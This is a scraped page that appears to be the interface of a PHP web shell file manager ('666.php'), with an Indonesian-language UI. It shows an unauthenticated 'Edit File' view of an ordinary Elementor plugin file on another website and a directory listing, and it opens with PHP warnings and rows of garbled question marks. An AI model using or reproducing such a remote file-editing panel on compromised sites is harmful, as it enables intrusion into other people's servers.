??????????????
??????????????
??????????????
??????????????
Warning : Undefined variable $auth in /home/u627560552/domains/kovexadvisory.com/public_html/666.php on line 546
Warning : Trying to access array offset on value of type null in /home/u627560552/domains/kovexadvisory.com/public_html/666.php on line 546
??????????????
??????????????
??????????????
??????????????
File Manager
✏️ Edit File: /home/mklsvubc/pgtankstorage.sg/wp-content/plugins/elementor/data/v2/base/processor.php
⬅ Kembali
<?php
namespace Elementor\Data\V2\Base;
if ( ! defined( 'ABSPATH' ) ) {
exit; // Exit if accessed directly.
}
/**
* Processor is just typically HOOK, who called before or after a command runs.
* It exist to simulate frontend ($e.data) like mechanism with commands and hooks, since each
* controller or endpoint is reachable via command (get_format).
* The `Elementor\Data\V2\Manager::run` is able to run them with the ability to reach the endpoint.
*/
abstract class Processor {
/**
* Controller.
*
* @var \Elementor\Data\V2\Base\Controller
*/
private $controller;
/**
* Get processor command.
*
* @return string
*/
abstract public function get_command();
/**
* Processor constructor.
*
* @param \Elementor\Data\V2\Base\Controller $controller
*/
public function __construct( $controller ) {
$this->controller = $controller;
}
}
Nama
Tipe
Ukuran
Diubah
Aksi
📁 endpoint
dir
—
2026-06-23 01:24
📁 exceptions
dir
—
2026-06-23 01:24
📁 processor
dir
—
2026-06-23 01:24
🐘 base-route.php
php
10.3 KB
2026-06-23 01:24
🐘 controller.php
php
11.8 KB
2026-06-23 01:24
🐘 endpoint.php
php
3.1 KB
2026-06-23 01:24
🐘 processor.php
php
872 B
2026-06-23 01:24